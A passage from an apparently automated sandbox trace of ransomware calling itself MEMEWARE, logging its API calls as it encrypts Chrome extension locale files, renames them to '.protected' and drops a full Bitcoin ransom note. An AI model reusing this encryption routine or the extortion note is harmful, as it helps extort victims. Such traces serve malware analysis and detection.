HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca") returned 142 [0079.216] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0079.216] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*") returned 144 [0079.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.217] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.217] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.217] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.217] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.217] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\.") returned 144 [0079.217] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.217] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.217] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.217] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.217] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.217] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.217] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\..") returned 145 [0079.217] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.217] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.217] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.217] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.217] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.217] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.218] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.218] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.218] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.219] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.219] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json") returned 156 [0079.219] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.219] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0079.220] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.220] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0079.220] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.220] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.220] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.220] CloseHandle (hObject=0x168) returned 1 [0079.220] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.protected") returned 166 [0079.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.protected")) returned 1 [0079.221] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.221] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.221] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\RESTORE_FILES.txt") returned 160 [0079.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.221] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.221] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.224] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.224] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.224] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.224] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.224] CloseHandle (hObject=0x164) returned 1 [0079.224] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0079.224] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0079.224] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs") returned 142 [0079.224] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0079.224] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0079.224] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*") returned 144 [0079.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.225] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\.") returned 144 [0079.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.225] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.225] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\..") returned 145 [0079.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.225] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.225] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.225] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.225] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.225] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.225] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.225] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.226] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.226] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.226] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.226] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.226] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json") returned 156 [0079.226] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.226] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.227] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.227] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.227] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.227] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.227] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.227] CloseHandle (hObject=0x168) returned 1 [0079.228] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.protected") returned 166 [0079.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json.protected")) returned 1 [0079.228] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.228] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.228] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\RESTORE_FILES.txt") returned 160 [0079.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.229] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.229] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.230] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.230] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.230] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.230] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.230] CloseHandle (hObject=0x164) returned 1 [0079.230] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.230] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0079.230] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0079.230] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0079.230] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0079.230] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0079.230] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da") returned 142 [0079.230] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0079.230] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0079.230] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*") returned 144 [0079.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 